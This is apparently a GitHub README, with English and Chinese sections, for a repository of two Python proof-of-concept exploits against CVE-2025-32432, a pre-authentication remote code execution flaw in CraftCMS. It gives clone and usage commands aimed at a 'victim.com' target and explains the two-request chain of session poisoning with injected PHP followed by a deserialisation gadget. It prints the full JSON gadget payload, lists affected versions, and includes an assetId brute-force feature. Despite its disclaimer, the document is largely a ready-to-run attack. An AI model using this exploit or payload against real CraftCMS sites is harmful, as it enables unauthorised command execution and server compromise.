Pre-auth Remote Code Execution for CraftCMS 3.x / 4.x / 5.x
PoC Maintainer: C.T.Y. (research use only)
Vulnerability Discovery: Nicolas Bourras – Orange Cyberdefense
Additional PoC Inspiration: SensePost research & Chirag Artani’s public script
This repository bundles two complementary Python exploits for CVE-2025-32432 — a pre-authentication RCE in CraftCMS’ asset-transform endpoint.
| Script | Purpose |
|---|---|
craftcms_rce_php_check.py |
Safety probe — sends one request using the FnStream gadget to verify whether arbitrary PHP executes (prints phpinfo() output). Ideal for low-impact confirmation. |
craftcms_final_payload.py |
Full exploit — two-packet chain: first implants PHP via FnStream, then leverages the FieldLayoutBehavior → PhpManager gadget to execute any shell command. |
The second script is the one described throughout this README.
The first script is included for completeness and quick validation, courtesy of Chirag Artani — see Credits.
Script filename was adapted for clarity; original structure & idea by Chirag Artani.
For educational & authorised security testing only.
Using these scripts against systems without explicit written permission is illegal and unethical.
- One-shot two-packet RCE
- Automatic
assetIdbrute-force (404 → 302heuristic) - Custom shell-command execution (
-c/--cmd) - Works over HTTP or HTTPS (SSL-verification warnings suppressed)
- Clean extraction of command output from HTML response
- Python 3.8+
- PyPI packages (install via
pip install -r requirements.txt):requestsurllib3
# Clone the repo
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt
# Install dependencies
pip install -r requirements.txtpython3 craftcms_rce_php_check.py -u https://victim.comIf you see phpinfo() output, the target is very likely exploitable.
python3 craftcms_final_payload.py -u https://victim.com -c "id"| Option | Long form | Description | Required |
|---|---|---|---|
-u |
--url |
Target base URL (no trailing slash) | ✅ |
-c |
--cmd |
Shell command to run | ✅ |
-a |
--asset |
Known good assetId |
❌ |
-s |
--scan-max |
Brute limit (default: 300) | ❌ |
- Session Poisoning — GET to
/index.php?p=admin/dashboard&a=<?=...?>writes arbitrary PHP into/tmp/sess_<ID>. - Deserialisation Gadget — POST to
actions/assets/generate-transformwith aFieldLayoutBehavior → PhpManagergadget forces CraftCMS torequire()the session file, executing the code.
{
"assetId": 11,
"handle": {
"width": 1,
"height": 1,
"as hack": {
"class": "craft\\behaviors\\FieldLayoutBehavior",
"__class": "yii\\rbac\\PhpManager",
"__construct()": [
{
"itemFile": "/tmp/sess_<SessionID>"
}
]
}
}
}- CraftCMS < 3.9.15 (requires
assetIdbrute-force) - CraftCMS < 4.14.15
- CraftCMS < 5.6.17
- Original Advisory — Nicolas Bourras / Orange Cyberdefense
- SensePost Deep-Dive Blog
- Chirag Artani’s PoC
- CraftCMS Security Advisory
- CVE-2025-32432 @ MITRE
- C.T.Y. — Full two-packet PoC & documentation
- Chirag Artani — Original
phpinfocheck script (craftcms_rce_php_check.py) and early research ideas Script filename was adapted for clarity; original structure & idea by Chirag Artani. - Nicolas Bourras / Orange Cyberdefense — Vulnerability discovery and responsible disclosure
- Additional insights from SensePost research team
Responsibility Notice: Any legal risks or damages arising from the use of this code are solely the responsibility of the user.
MIT License — see LICENSE.
| 檔案 | 用途 |
|---|---|
craftcms_rce_php_check.py |
PHP 執行可行性檢查:單一請求,使用 FnStream 觸發 phpinfo(),以低影響方式驗證目標是否易受攻擊。此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。 |
craftcms_final_payload.py |
兩包鏈完整利用:先以 FnStream 植入 PHP,再透過 PhpManager 執行任意指令。 |
僅供教學與合法授權測試使用。未經授權操作即屬違法。
python3 craftcms_rce_php_check.py -u https://目標站python3 craftcms_final_payload.py -u https://目標站 -c "id"參數與英文版相同。
- Chirag Artani —
phpinfo檢查腳本 此檔案名稱為說明用途而調整,原始概念與程式架構來自 Chirag Artani。 - Nicolas Bourras / Orange Cyberdefense — 漏洞發現與技術靈感
- SensePost — 技術靈感
使用本程式碼造成之任何法律風險與損失,由使用者自行承擔。
MIT License